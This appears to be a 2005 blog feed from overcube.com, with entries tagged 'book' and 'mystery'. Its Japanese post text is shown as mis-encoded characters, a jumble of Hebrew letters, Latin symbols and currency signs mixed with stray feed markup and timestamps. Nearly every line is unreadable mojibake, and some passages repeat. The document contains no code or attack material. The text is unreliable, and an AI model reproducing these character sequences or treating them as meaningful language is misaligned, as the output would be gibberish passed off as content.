²ב₪®µמ₪ך₪·ֶ¡¹₪־₪³₪ָ₪ֻֿ÷₪ל₪ֶ₪ג¡¢ּ₪ֽט₪־₪³₪ָ₪₪י₪×₪₪¨₪ֶ₪₪₪כ»ה₪ַ₪¹¡£ ַ¯ֻצ¹±־ד´כ²ט₪־₪ט₪¦₪µ₪₪ג₪·₪ֶ₪­₪₪·₪¿¡³(¡­¡¼¡®)¥־ ִ¹₪¯₪₪ֳ₪¿₪־₪ַ¡¢ֶף₪ִ₪ֻ¬₪±₪₪·₪¿¡£₪₪÷₪ֿ¡¢¸°ּ₪«₪י»°°ּ₪₪ַ¡£ »ִ₪ך₪ֿ½ּכ₪־¾ג₪־ִּ₪כ÷¢₪ֻ¡£ ֲט£µ°ּ¡¡¡ײ¥¸¥ח¥»¥ױ¡¦¥ײ¥ם¥°₪־ְ¸³¶¡׳ ¥ײ¥ם¥°₪־ֱֿ»ֿ¼װ¡¢¥¸¥ח¥»¥ױ¡¦¥ײ¥ם¥°¡£ £¹ְ₪µ×¥־¥ײ¥´¥ם¥ֹ₪ֳֻ¼₪עָ¯₪¹₪כ¥ײ¥ם¥°²ָ¡¢₪½₪־ֲט£¶£¶ֲוֵצ¼ח₪ַ₪¢₪כ¥¸¥ח¥»¥ױ₪־¡¢ִֽ¾¯»‏₪־»׳₪₪½׀₪«₪י׸ל₪ֿ»ֿ₪₪כ¡£ ¾¯ַ¯¥¸¥ח¥»¥ױ₪ֿ₪ײ°ֹ₪־ֳֿ²¼₪עֳµ¸¡ֳז¡¢¥³¥¦¥ג¥ך₪¿₪ֱ₪־·²₪ל₪ֻ½׀²ס₪¦¡₪ֱ₪₪₪ֻ¡ײ¥׀¥ֳ¥ָ¥¥ף¡¦¥׃¥®¥ף¥÷¡׳₪־¸¶÷מ₪ֻֿ½ס₪ַ₪¢₪כ¡ֻ¡£ ₪½₪·₪ֳֶֿµו₪־ֶגֹפ₪ֿ¥ײ¥ם¥°²ֲָו¡¹₪־ֵ״־ֿ₪ֻ₪ט₪ך¡¢·¡₪ך₪ִ₪¯₪µ₪ל¡¢¶ץֶ¶₪ֻ₪₪ֳ₪ֶ₪₪₪כ₪³₪ָ₪עָ¯¸«₪¹₪כ¡£ ₪×ץֳµ₪·₪־²ָ·ֿ₪ַ₪¢₪ֳ₪¿¥ײ¥ם¥°²ָ₪ֿ¡¢·¡₪ך₪ֻ·¡₪ֳ₪¿₪¹₪¨¡¢₪ִ₪₪₪ֳֻֿµוֶגֹפ₪ע·¡₪ך₪ִ₪¯₪·₪ֶ₪₪₪¿₪־₪ְ¡£ ₪×ץ₪ֿ₪₪«₪ֳ₪¿₪־₪ְ¡£¶ץ₪ֳ₪₪ְ¡£ ₪·₪«₪·¡¢¥¸¥ח¥»¥ױ₪ָֿ¯ֱ₪עµױֵ¾₪¹₪כ¡£ ¥³¥¦¥ג¥ך₪ע¼ך₪₪÷₪±¡¢ֱֵ½ס¥³¥¦¥ג¥ך₪ֻ»ֵ־©₪ֶ¾ו₪²¡¢ְ₪³¦÷ֳַ»µק־¥₪־ִּ¿®ּײ₪ע¹½ֳ¡£ֳ¯₪ג₪¬ֳ־₪כ¡¢¥₪¥ף¥¿¡¼¥ֽ¥ֳ¥ָ₪־µ¯¸»₪ַ₪¢₪כ¡£ ¥¸¥ח¥»¥ױ₪־¼«ֱֵ¡ײ¶ץµץ₪«₪יְ¸₪₪ל₪¿ֹ¡׳₪ֿ£²£±ְ₪µ×÷ַ½י₪־¥¥¹¥ָ¥»¥י¡¼¡£ ₪·₪«₪·¡¢ֻ½ס₪ַ₪ֿ¡¢¼«ֱֵ₪ַ¸ל₪י₪ל₪₪«₪ֳ₪¿¥¸¥ח¥»¥ױ₪־ֱַ´י₪¬ֱֹ₪«₪ל₪כ¡£ ¥¹¥ׁ¥א¥³¥ב¥ף¥ָ₪עֱֻ₪א₪¿₪ב¡¢₪׿§µ₪¥ב¥¹¥³¥¦¥ג¥ך₪ֻ₪ט₪ֳ₪ֶ¡¢¥¹¥ׁ¥א¥³¥¦¥ג¥ך₪ע°לּײֲַ¿װ₪ֻ₪¹₪כ₪₪ֹ¡¢´סָ´₪ָ¯ֱ₪ְַ₪³¦₪עׁ₪¨₪ֶ₪₪₪¯¡¢¥¸¥ח¥»¥ױ¡¦¥ײ¥ם¥° 33rd¡£ ₪µ₪י₪ֻֻ½ס₪ַ₪ֿ¡ײ÷ַ½י₪־¥ָ¥י¥ֳ¥¯¥׀¥ֳ¥¯¡׳₪־ֶז₪¬½י₪ב₪ְֶּ₪«₪µ₪ל₪כ¡£ ₪½₪ל₪ֿ£±£³ְ₪µ×¡¢¥ײ¥ם¥°²ֲָט£±£±ֲו₪־÷¢¡£¥־¥ײ¥´¥ם¥ֹ₪ֿ₪₪₪ן₪ז₪כ¡ײ¥¿¥¿¡¼¥כ₪־₪¯₪׃₪­¡׳₪־₪ג₪ָ₪ֻ₪¢₪ֳ₪¿¡£ ¥ײ¥ם¥°²ָ₪־ּז¾ֿ₪ַ₪¢₪כ¡¢¸׳₪ְָן₪¦ֶ₪־₪ט₪¦₪¥±¥ג¥־₪־¿ֱ₪¬ִך₪ב₪י₪ל₪¿₪־₪ג¡¢₪³₪־÷¢₪ְ¡£ ֶ₪־₪ט₪¦₪¥±¥ג¥־₪ֿ¡¢א׃¡£¸׳₪ֿ¥ג¥ף¥´¥כ₪עֹ½₪·¡¢¶¯ֵ¨₪ֲֻ׀₪·₪ֶֹ½־©₪ֳ₪ֶ₪ְֿן₪ן₪₪₪₪¬¡¢ּ´₪־ֳז₪ַ₪½₪³₪ֿ₪«₪ָ₪₪¯¿»¿©₪¹₪כא׃₪ָ₪·₪ֶ¡¢¥ײ¥ם¥°²ָ₪ֿ»‏ֲו₪עְ¸₪­±ה₪׃₪¿₪־₪ְ¡£ ₪¹₪₪ן₪ֱ¡¢¡ײ¸׳¡¢¿©₪¦¡¢א׃¡׳¡£¥ָ¥י¥ֳ¥¯¥׀¥ֳ¥¯¡ִ¡£ ₪³₪־»‏ֲו₪־ּµּ¾»װּ±₪¿₪ֱ₪־ִּ¿®₪עµ­₪·₪¿ַע³ע¸½ס₪ֿ¡¢¥ײ¥ם¥°₪־¿¿₪־µ¯¸»₪ְ₪ָ₪µ₪ל₪ֶ₪₪₪כ¡£... - - overQ - - - - book - - ₪¿₪יֻ£±£¹₪־ֶף₪ִּ₪־₪×ֲך₪ֿ¡¢¡ײ£²£°£°£µַ¯₪־¥¥¹¥ָֻ¡׳₪ַ₪·₪¿¡£₪³₪ֱ₪י₪ֻ₪ג₪×ֵת₪¨₪·₪¿₪¯₪ֶ¡¢₪₪₪ם₪₪₪ם¹ֽ₪¨₪ֶ₪ֿ₪₪¿₪־₪ַ₪¹¡£₪¬¡£
    -₪·₪«₪·¡¢¹ֽ₪¨₪ע₪ב₪°₪י₪¹₪¦₪ֱ¡¢ִ¾¶ב₪־₪³₪ָ₪·₪«»׳₪₪½׀₪»₪₪₪»ה₪¬¡¢₪½₪³₪ֻ₪ֿ₪₪₪¿₪־₪ַ₪¢₪ֳ₪¿¡£
    -ֵ·₪־ְ¼¡¦¸ֱֿנַ®¥¹¥¿¥ֻ¥¹¥ן¥ױ¡¦¥ל¥א ¥³¥ל¥¯¥·¥ח¥ף₪³₪³10ֶ₪¯₪י₪₪₪ֶַֹ₪ף₪ְ¥¥¹¥ָֻ₪·₪«₪ן₪«₪י₪ף₪ַ₪¹¡£¡₪ֱ₪₪₪ֻ¡¢₪½₪ל₪ֿ¥ל¥א¡ײֵ·₪־ְ¼¡¦¸ֱֿנַ®¡׳¡ֻ¡£

    - -

    ₪ָ₪₪₪¦₪ן₪±₪ַ¡¢ֽטַ¯₪ְ¡££²£°£°£¶ַ¯₪־¥¥¹¥ָֻ₪ע¸₪ִ₪׀₪«₪ך¡£
    -²ב₪®µמ₪ך₪·ֶ¡¹₪־₪³₪ָ₪ֻֿ÷₪ל₪ֶ₪ג¡¢ּ₪ֽט₪־₪³₪ָ₪₪י₪×₪₪¨₪ֶ₪₪₪כ»ה₪ַ₪¹¡£
    -ַ¯ֻצ¹±־ד´כ²ט₪־₪ט₪¦₪µ₪₪ג₪·₪ֶ₪­₪₪·₪¿¡³(¡­¡¼¡®)¥־

    - -

    ִ¹₪¯₪₪ֳ₪¿₪־₪ַ¡¢ֶף₪ִ₪ֻ¬₪±₪₪·₪¿¡£₪₪÷₪ֿ¡¢¸°ּ₪«₪י»°°ּ₪₪ַ¡£
    -»ִ₪ך₪ֿ½ּכ₪־¾ג₪־ִּ₪כ÷¢₪ֻ¡£

    - -


    -ֲט£µ°ּ¡¡¡ײ¥¸¥ח¥»¥ױ¡¦¥ײ¥ם¥°₪־ְ¸³¶¡׳

    - -

    ¥ײ¥ם¥°₪־ֱֿ»ֿ¼װ¡¢¥¸¥ח¥»¥ױ¡¦¥ײ¥ם¥°¡£

    - -

    £¹ְ₪µ×¥־¥ײ¥´¥ם¥ֹ₪ֳֻ¼₪עָ¯₪¹₪כ¥ײ¥ם¥°²ָ¡¢₪½₪־ֲט£¶£¶ֲוֵצ¼ח₪ַ₪¢₪כ¥¸¥ח¥»¥ױ₪־¡¢ִֽ¾¯»‏₪־»׳₪₪½׀₪«₪י׸ל₪ֿ»ֿ₪₪כ¡£

    - -

    ¥׀¥ֳ¥ָ¥¥ף ¥׃¥®¥ף¥÷ ֳֶַָּ
    -¾¯ַ¯¥¸¥ח¥»¥ױ₪ֿ₪ײ°ֹ₪־ֳֿ²¼₪עֳµ¸¡ֳז¡¢¥³¥¦¥ג¥ך₪¿₪ֱ₪־·²₪ל₪ֻ½׀²ס₪¦¡₪ֱ₪₪₪ֻ¡ײ¥׀¥ֳ¥ָ¥¥ף¡¦¥׃¥®¥ף¥÷¡׳₪־¸¶÷מ₪ֻֿ½ס₪ַ₪¢₪כ¡ֻ¡£
    -₪½₪·₪ֳֶֿµו₪־ֶגֹפ₪ֿ¥ײ¥ם¥°²ֲָו¡¹₪־ֵ״־ֿ₪ֻ₪ט₪ך¡¢·¡₪ך₪ִ₪¯₪µ₪ל¡¢¶ץֶ¶₪ֻ₪₪ֳ₪ֶ₪₪₪כ₪³₪ָ₪עָ¯¸«₪¹₪כ¡£

    - -

    ₪×ץֳµ₪·₪־²ָ·ֿ₪ַ₪¢₪ֳ₪¿¥ײ¥ם¥°²ָ₪ֿ¡¢·¡₪ך₪ֻ·¡₪ֳ₪¿₪¹₪¨¡¢₪ִ₪₪₪ֳֻֿµוֶגֹפ₪ע·¡₪ך₪ִ₪¯₪·₪ֶ₪₪₪¿₪־₪ְ¡£
    -₪×ץ₪ֿ₪₪«₪ֳ₪¿₪־₪ְ¡£¶ץ₪ֳ₪₪ְ¡£

    - -

    ₪·₪«₪·¡¢¥¸¥ח¥»¥ױ₪ָֿ¯ֱ₪עµױֵ¾₪¹₪כ¡£

    - -

    ¥³¥¦¥ג¥ך₪ע¼ך₪₪÷₪±¡¢ֱֵ½ס¥³¥¦¥ג¥ך₪ֻ»ֵ־©₪ֶ¾ו₪²¡¢ְ₪³¦÷ֳַ»µק־¥₪־ִּ¿®ּײ₪ע¹½ֳ¡£ֳ¯₪ג₪¬ֳ־₪כ¡¢¥₪¥ף¥¿¡¼¥ֽ¥ֳ¥ָ₪־µ¯¸»₪ַ₪¢₪כ¡£

    - -

    ¥¸¥ח¥»¥ױ₪־¼«ֱֵ¡ײ¶ץµץ₪«₪יְ¸₪₪ל₪¿ֹ¡׳₪ֿ£²£±ְ₪µ×÷ַ½י₪־¥¥¹¥ָ¥»¥י¡¼¡£
    -₪·₪«₪·¡¢ֻ½ס₪ַ₪ֿ¡¢¼«ֱֵ₪ַ¸ל₪י₪ל₪₪«₪ֳ₪¿¥¸¥ח¥»¥ױ₪־ֱַ´י₪¬ֱֹ₪«₪ל₪כ¡£

    - -

    ¥¹¥ׁ¥א¥³¥ב¥ף¥ָ₪עֱֻ₪א₪¿₪ב¡¢₪׿§µ₪¥ב¥¹¥³¥¦¥ג¥ך₪ֻ₪ט₪ֳ₪ֶ¡¢¥¹¥ׁ¥א¥³¥¦¥ג¥ך₪ע°לּײֲַ¿װ₪ֻ₪¹₪כ₪₪ֹ¡¢´סָ´₪ָ¯ֱ₪ְַ₪³¦₪עׁ₪¨₪ֶ₪₪₪¯¡¢¥¸¥ח¥»¥ױ¡¦¥ײ¥ם¥° 33rd¡£

    - -

    ₪µ₪י₪ֻֻ½ס₪ַ₪ֿ¡ײ÷ַ½י₪־¥ָ¥י¥ֳ¥¯¥׀¥ֳ¥¯¡׳₪־ֶז₪¬½י₪ב₪ְֶּ₪«₪µ₪ל₪כ¡£

    - -

    ₪½₪ל₪ֿ£±£³ְ₪µ×¡¢¥ײ¥ם¥°²ֲָט£±£±ֲו₪־÷¢¡£¥־¥ײ¥´¥ם¥ֹ₪ֿ₪₪₪ן₪ז₪כ¡ײ¥¿¥¿¡¼¥כ₪־₪¯₪׃₪­¡׳₪־₪ג₪ָ₪ֻ₪¢₪ֳ₪¿¡£
    -¥ײ¥ם¥°²ָ₪־ּז¾ֿ₪ַ₪¢₪כ¡¢¸׳₪ְָן₪¦ֶ₪־₪ט₪¦₪¥±¥ג¥־₪־¿ֱ₪¬ִך₪ב₪י₪ל₪¿₪־₪ג¡¢₪³₪־÷¢₪ְ¡£

    - -

    ֶ₪־₪ט₪¦₪¥±¥ג¥־₪ֿ¡¢א׃¡£¸׳₪ֿ¥ג¥ף¥´¥כ₪עֹ½₪·¡¢¶¯ֵ¨₪ֲֻ׀₪·₪ֶֹ½־©₪ֳ₪ֶ₪ְֿן₪ן₪₪₪₪¬¡¢ּ´₪־ֳז₪ַ₪½₪³₪ֿ₪«₪ָ₪₪¯¿»¿©₪¹₪כא׃₪ָ₪·₪ֶ¡¢¥ײ¥ם¥°²ָ₪ֿ»‏ֲו₪עְ¸₪­±ה₪׃₪¿₪־₪ְ¡£
    -₪¹₪₪ן₪ֱ¡¢¡ײ¸׳¡¢¿©₪¦¡¢א׃¡׳¡£¥ָ¥י¥ֳ¥¯¥׀¥ֳ¥¯¡ִ¡£

    - -

    ₪³₪־»‏ֲו₪־ּµּ¾»װּ±₪¿₪ֱ₪־ִּ¿®₪עµ­₪·₪¿ַע³ע¸½ס₪ֿ¡¢¥ײ¥ם¥°₪־¿¿₪־µ¯¸»₪ְ₪ָ₪µ₪ל₪ֶ₪₪₪כ¡£

    - -

    ַע³ע₪־¼ך»ז₪עֱק₪ך₪₪·₪¿¡½¥ם¥·¥¢ֳזְ₪ֵװ»װ₪־־ע»ֻ₪ֶָ¾ןְ¸³ט

    ]]> -
    ֲט£´°ּ¡¡¡ײ¶ו½½¶וּכ¡¡ֱ‎ה´°ֱ´ַָ¡׳

    - -

    ÷מ¼װ₪¢₪ָ₪¬₪­₪ט₪ךָ´¿ט¡ִ

    - -

    ¡ײ´°ְ®₪ט₪ךֱ°₪ֻ¡¢₪₪÷₪¢₪ָ₪¬₪­₪¬₪ַ₪­₪₪·₪¿¡³(¡­¡¼¡®)¥־

    - -

    ¶ו½½¶וּכ₪ֿ¡¢99₪־ּכ₪ָ₪₪₪¦°ױּ£₪ַ₪¹¡£99₪ָ₪₪₪¦₪־₪ֹֿ´₪«₪י1₪ע¸÷₪¸₪¿¼«ֱ³¿פ₪ַ₪¹¡£
    -₪½₪ל₪ֿ´ֱ»ת₪ַ₪ַֿע₪ָ₪₪ך₪₪¹¡£
    -99ּכ₪¹₪₪ן₪ֱַעּכ₪ָ₪₪₪¦₪־₪ּֿכ₪¬ַע₪₪₪³₪ָ¡£ּכ₪₪־₪ַֻעֳכ₪־₪ט₪¦₪ְֲֻֽ₪¬½׀₪ְֶּ₪כ₪₪¾ץֲײ₪ַ₪¹¡£

    - -

    ₪·₪«₪·¡¢ּכ₪ָ₪₪₪¦₪־₪ְֲֽֿ₪¬ְִ₪ף₪ְ¾ץֲײ₪ע»״₪¹₪־₪ַ₪¹¡£ּ·½ג¡£
    -₪₪¼ְֲֽ½׀₪ֳ₪·₪₪־₪ֻ¡¢ּכ₪¬ֽט₪¿₪³₪ָ₪¬₪ן₪«₪כ₪־¡£¶­ּ₪ָ₪«¡¢₪ֹ₪¦₪ה₪ֳ₪ֶ·ט₪ב₪כ₪־¡£₪₪₪ה¡¢·ט₪ב₪י₪ל₪₪₪¡£
    -¥·¥§¥״¥י¥¶¡¼¥ֹ₪ּֿµ¸ֲ₪ֻ¸ל₪ך₪ִ₪ֵ₪±₪ֽ₪׀₪₪י₪₪₪₪־₪ַ₪¹¡£

    - -

    ₪¹₪כ₪ָ₪½₪ל₪ֿ°לּכ₪ָ₪₪₪¦₪³₪ָ₪ֻ₪₪ֳ₪ֶ₪·₪₪₪₪ֿ₪¹₪₪₪₪«¡£₪₪₪₪ֳ₪ֱ₪ף₪°¡£

    - -

    ₪«₪¯₪·₪ֶ99₪ָ1₪ֵֿש¹ז₪ַ·כ₪׀₪ל₪₪¹¡£
    -¶ו½½¶וּכ₪־´°ְ®₪ֿ¡¢99₪ֻ1₪עֲוֶ‏₪¹₪כ₪³₪ָ₪ַ¡¢₪¿₪«₪ְ₪«°לּכ₪ע°ױּ£₪¹₪כ₪ְ₪±₪ָ₪₪ך¡¢₪ז₪¨₪ֻ¶ו½½¶וּכ₪ּֿ₪´°₪ַ₪¢₪ך¡¢₪₪ְ₪₪ְ₪ִ₪ֵ₪¯₪³₪ָ₪¬¡¢¾ְּ₪µ₪ל₪¿¡£¡׳

    - -


    -ֲט£³°ּ¡¡¡ײ₪¦₪כ₪¦ֲֹ¡׳

    - -

    £²£°£°£¶ַ¯£±·מ£±ֶ¡¢₪¦₪כ₪¦ֳֹ₪¬ֱֶ‏₪µ₪ל₪כ₪י₪·₪₪¡£

    - -

    ₪·₪«₪·¡¢₪¦₪כ₪¦ֳֹ¡¢₪ָ₪₪₪¦ֹ½¸½₪ֿ¡¢ׁ₪ַ₪ֿ₪₪₪₪־₪«¡£
    -°לֳֹ₪ְ₪±ֱ‎₪¨₪כ₪־₪¬¡ײ₪¦₪כ₪¦ֳֹ¡׳₪ָ₪₪₪¦₪₪י¡¢£²·מ£²£¹ֶ₪ע£±ֶ₪ְ₪±ֲ­₪¹₪־₪ֿ¡¢¡ײ₪¦₪כ₪¦ַ¯¡׳₪ַ₪ֿ₪₪¯¡¢¡ײ₪¦₪כ₪¦ֶ¡׳₪ֻ₪¹₪®₪₪₪₪־₪ַ₪ֿ₪₪₪₪«¡£

    - -

    ₪₪₪ה¡£₪½₪ל₪ָ₪ג¡£
    -¡ִ¡ײ₪¦₪כ₪¦ַ¯¡׳₪ג₪¢₪כ₪־₪«¡£₪¹₪ַ₪ֻ₪¢₪ֳ₪¿₪־₪«¡£

    - -

    ₪₪₪ה₪ִֻ¹₪₪°לַ¯¡¢₪¦₪כ₪¦ַ¯¡£₪½₪ל₪ג₪½₪־₪ֿ₪÷₪ְ¡¢°לַ¯ֽ¾¬₪ֹֻױ₪±ֲ­₪µ₪ל₪ֶ₪₪₪כ¡£

    - -

    ₪¦₪כ₪¦ְ₪µ×₪ָ₪₪₪¦₪־₪ֿ₪ֹ₪¦₪ְ¡£
    -£²£±ְ₪µ×₪ֿ¡¢ֱ°ְ₪µ×₪ָֻז₪₪ֶ¡¢²¿₪«¿·₪·₪₪₪ג₪־₪ֻ₪₪ֳ₪ֶ₪₪₪כ₪ְ₪ם₪¦₪«¡£₪×₪₪±₪ֻ₪₪ֳ₪ֶ₪ֿ₪₪₪₪₪₪ְ₪ם₪¦₪«¡£₪¢₪ֳ₪ֶ₪ג₪₪¯₪ֶ₪ג₪₪₪₪₪ט₪¦₪·«₪ךײ₪·₪ֻ¡£

    - -

    ₪¦₪כ₪¦¿ְֽ¸¡£
    -₪₪ף₪ְ₪«¡¢ְ¸₪₪ל₪ֶ₪³₪־‎¡¢ֽ¾ְ¸₪־₪ט₪¦₪¿ְֽ¸₪ְ¡£ֵֻצ₪־¿ְֽ¸₪ֿ₪ֹ₪³₪״¹װ₪ֳ₪¿₪־₪ְ¡£

    - -

    ₪¦₪כ₪¦ְ₪³¦»ֻ¡£
    -¿ֽ־א₪ֿ¡¢ֳֿµו₪־־ע»ֻ₪ֻ₪ָ₪ֳ₪ֶ¡¢₪¦₪כ₪¦₪ֻ₪¹₪®₪₪₪¡£ֽ¾·׳ס£

    - -

    ₪³₪¦₪·₪ֶ¡¢¡ײ₪¦₪כ₪¦¡׳₪־¥ׂ¥¥ִ₪ֻµ₪₪ֵ₪₪₪¿ֻֽ₪¿₪ֱ₪ֿ¡¢¡ײֵֻצ₪־»‏´ײ¡׳₪עµב₪ב¡¢־¹־©₪ִ¡£
    -₪¦₪כ₪×₪₪₪ֻֻ‏₪ֱ₪¿ֽ¾ְ¸₪ע¼־₪ֶ¡¢¼÷₪ן₪ל₪¿»‏₪ע¸«½׀₪¹₪₪¯¡¢÷½ַש₪״₪×₪ג₪א₪¯₪־₪ְ¡£ְן₪₪₪ֿ»ֿ₪₪ֳ₪¿₪׀₪«₪ך₪ְ¡£²¿₪ְָן₪ֳ₪ָ₪כ₪ף₪ְ¡£₪¦₪כ₪¦₪כ₪¦₪כ₪¦₪כ¡£
    -ֶז₪־¥ׂ¥ם¥₪¥ֳ¥¯¡¦¥ױ¥¡¥ף¥¿¥¸¡¼¡©

    - -


    -

    ]]> -
    -
    - - ¡ײֹװµ₪ּ£₪־ֳ«¡׳¸½¾¡¢½₪ְµהֲ­¡´ְ¡ֻ - - 2005-12-30T02:45:26Z - 2005-12-30T11:45:26+09:00 - tag:www.overcube.com,2005:/blog//2.678 - 2005-12-30T02:45:26Z - ֱ°²ף₪־µ­»צ₪ַ¡¢ֹװµ₪ּ£₪־ֳ«¸½¾₪ָ₪₪₪¦₪־₪ע½ס₪₪₪¿₪־₪ַ₪¹₪¬¡¢ֵ׃ֳז₪ֲַ³₪­₪ֻ½ס₪¯₪³₪ָ₪עֻ÷₪ל₪ֶ₪·₪₪₪¡¢ּ₪ֳֿ₪ֻ₪₪ֳ₪ֶ₪·₪₪₪₪₪·₪¿(¡¨¡¦¢ֿ¡¦) ֹװµ₪ּ£₪־ֳ«¸½¾₪ָ₪ֿ¡¢ֳ«־¼»ׂ₪¬¡¢´°את₪ֻ¶ב₪ֵ₪±₪׀¶ב₪ֵ₪¯₪₪ֹ¥₪¥ה¥₪¥»¥ל¥ײ₪¿ְֽ¸₪ֻ₪₪ֳ₪ֶ₪·₪₪¦¸½¾₪ע²עְּ₪·₪¿₪ג₪־₪ַ₪¹¡ָ‏ֻֻ₪µ₪ְג¡¢÷ֲֳִֹ¸ֻח÷¹₪·¾ו₪²₪₪¹¡ֻ¡£ ₪µ₪ֶ¡¢÷£÷¢₪ֻ₪₪ֳ₪ֶ¡¢½ס₪³₪¦₪ָ»׳₪ֳ₪ֶ₪¿¡ײֲ³₪­¡׳₪ע»׳₪₪½׀₪·₪₪·₪¿¡£ ₪³₪־ַ¯ֻצ₪־₪¢₪ן₪¿₪ְ₪·₪₪»‏´₪ֻ¡¢₪¸₪ִ₪ֻ₪־₪ף₪׃₪ך₪·₪¿ֵ¸³«₪ֻ₪₪ֳ₪ֶ₪×₪ך₪₪¹¡£ ₪ַ₪ג¡¢₪»₪ֳ₪«₪¯»׳₪₪½׀₪·₪¿₪ף₪ַ¡¢¡ײֲ³₪­¡׳₪־ֶגֶֽ₪ע₪«₪₪₪ִ₪₪ף₪ַ₪´ְגְּ₪·₪ֶ₪×₪¯₪ָ¡£... - - overQ - - - - mystery - - ֱ°²ף₪־µ­»צ₪ַ¡¢ֹװµ₪ּ£₪־ֳ«¸½¾₪ָ₪₪₪¦₪־₪ע½ס₪₪₪¿₪־₪ַ₪¹₪¬¡¢ֵ׃ֳז₪ֲַ³₪­₪ֻ½ס₪¯₪³₪ָ₪עֻ÷₪ל₪ֶ₪·₪₪₪¡¢ּ₪ֳֿ₪ֻ₪₪ֳ₪ֶ₪·₪₪₪₪₪·₪¿(¡¨¡¦¢ֿ¡¦)

    - -

    ֹװµ₪ּ£₪־ֳ«¸½¾₪ָ₪ֿ¡¢ֳ«־¼»ׂ₪¬¡¢´°את₪ֻ¶ב₪ֵ₪±₪׀¶ב₪ֵ₪¯₪₪ֹ¥₪¥ה¥₪¥»¥ל¥ײ₪¿ְֽ¸₪ֻ₪₪ֳ₪ֶ₪·₪₪¦¸½¾₪ע²עְּ₪·₪¿₪ג₪־₪ַ₪¹¡ָ‏ֻֻ₪µ₪ְג¡¢÷ֲֳִֹ¸ֻח÷¹₪·¾ו₪²₪₪¹¡ֻ¡£

    - -

    ₪µ₪ֶ¡¢÷£÷¢₪ֻ₪₪ֳ₪ֶ¡¢½ס₪³₪¦₪ָ»׳₪ֳ₪ֶ₪¿¡ײֲ³₪­¡׳₪ע»׳₪₪½׀₪·₪₪·₪¿¡£
    -₪³₪־ַ¯ֻצ₪־₪¢₪ן₪¿₪ְ₪·₪₪»‏´₪ֻ¡¢₪¸₪ִ₪ֻ₪־₪ף₪׃₪ך₪·₪¿ֵ¸³«₪ֻ₪₪ֳ₪ֶ₪×₪ך₪₪¹¡£

    - -

    ₪ַ₪ג¡¢₪»₪ֳ₪«₪¯»׳₪₪½׀₪·₪¿₪ף₪ַ¡¢¡ײֲ³₪­¡׳₪־ֶגֶֽ₪ע₪«₪₪₪ִ₪₪ף₪ַ₪´ְגְּ₪·₪ֶ₪×₪¯₪ָ¡£

    ]]> - ְן¸ו₪־ֶֻ¡¢¾¼ֲֿ£³£°ַ¯ֲו£´£°ַ¯ֲו₪¯₪י₪₪₪₪ַ₪ֿ¡¢ֳױְ₪¼ׂ²ס₪ַ₪·₪¿₪¬¡¢ּ´₪¬₪¢₪ֳ₪¿¡¢₪₪ף₪ֶ¸ְ₪ן₪ל₪₪¹¡£
    -´°ֱ´₪ֻ₪ֿ₪¢₪₪ך₪ִֻר±ף₪₪₪־₪ַ¡¢₪«₪¨₪ֳ₪ֶ¡ײּ´¡׳₪ע₪₪כ₪³₪ָ₪¬₪ַ₪­₪¿¡£

    - -

    °ל‎¡¢¿ְ®₪־ְ₪₪־ֳז₪ֿ¡¢÷₪«₪₪₪ָ₪³₪ם₪₪ַ₪װ₪ֳ₪·₪ך₪ַָ־¸₪¬¹װ₪­ֶֿ₪₪₪ֶ₪₪₪ֶ¡¢₪ֱ₪ח₪ֳ₪ָ₪·₪¿¥¥¹₪ַ₪גֲח₪²₪µ₪ֻ²ב¼÷₪¬»״ֵ¦₪µ₪ל₪כ¡£
    -´°את₪₪ַ₪ג₪¦°לג¡ִ₪־₪ֿ₪÷₪¬¡¢₪«₪¨₪ֳ₪ֶֹװּ²ק₪ַ¡¢₪₪₪י₪₪₪יְֻ₪¬ח₪ך¡¢¥¢¥י₪¬ּ־©₪ֱ₪₪¯₪כ¡£
    -ּ´¸«₪כֽ¾ֳֿ₪ֿ₪₪¯₪₪ך¡¢´°ֱ´₪µ₪״₪־₪ן₪÷₪«₪¥÷¥ל₪¬µ₪₪ֻ₪₪ֳ₪ֶ»ֵ‎₪₪₪¡£
    -ֳז₪ֻ₪ֿ¥₪¥י¥₪¥י₪ֲֻׁ₪¨ְ₪ל₪÷¡¢°ױּ£ֹװְּ₪ַ¼«ֻ½¼«´‏₪־¼ט₪ךײ₪·₪־₪ִ₪«₪₪₪¥ֿ¥ֱ¥ד¥ב¥ֱ¥ד₪ֳֻ¦ְ‏ֵ¾₪₪·₪ֶ₪·₪₪¦¿ֽ₪¿₪ֱ₪ג₪₪₪כ¡£

    - -

    ₪³₪ל₪ֿ¡¢ֹװµ₪ּ£₪־ֳ«¸½¾₪ָ¡¢₪ט₪¯»ק₪ֶ₪ֿ₪₪₪₪»₪ּ₪«¡ִ₪ָ₪₪₪¦ֳֿ₪ע½ס₪³₪¦₪ָ»׳₪ֳ₪ֶ₪¿₪ף₪ַ₪¹₪ט¡£₪ֿ₪ֿ₪ֿ₪ֿ¡µץ¾׀

    - -

    ₪¢₪¢¡¢₪ֱ₪ד₪ף₪ָ½ס₪₪₪ֶ₪ל₪׀¡¢₪¨₪¨µ­»צ₪ֻ₪₪ֳ₪ָ₪¿₪־₪ֻ¡ַת
    -¥²¡¼¥א₪־ֳֿ₪עֻם₪ֻ¡¢¸½ֲו₪־ְ₪ֱך₪ע»ֲ₪כ¡ְֱִַ²₪י₪·₪₪ֵ¸³«₪ְ¡¢¥ײ¥ם¥°₪־¶ְ₪ְ¡³¯ִ״

    - -

    ₪₪¢¡¢ֹװµ₪ּ£₪־ֳ«¸½¾₪־ְגְּ₪ֻ₪ט₪ל₪׀¡¢´°את₪ֻ¶ב₪ֵ₪±₪¹₪®₪₪₪₪־₪¬¡¢ּ´¸«₪כ₪¿₪ב₪־ֲחְ₪¾ע·ן¡ִ¡ײָכ₪¹₪ל₪׀²ײ¡׳₪₪־₪ַ¡¢₪³₪ף₪₪ף₪ַ¡¢₪₪₪₪₪ף₪ַ₪¹₪ט₪ֽ¡£ֳױְ₪ֿ₪₪ב¸ְֽױ¡°ײ

    - -

    ₪ָ₪³₪ם₪ַ¡¢ֹװµ₪ּ£₪־ֳ«¥°¥י¥ױ₪ַ₪ֿ¡¢´°ֱ´₪µ¡¥ך¥¢¥כ₪µ¡ֻ₪¬£±£°£°¥ׁ¡¼¥»¥ף¥ָ₪ֻ₪₪כ₪ָ¡¢¿ֶ₪·₪₪ה₪¹₪µ₪גµֲ®₪ֻ²ףֹ₪·₪ֶ¡¢£±£°£°¥ׁ¡¼¥»¥ף¥ָ₪ֻ₪₪כ₪ט₪¦₪ְִֻך₪µ₪ל₪ֶ₪₪₪₪¹¡£
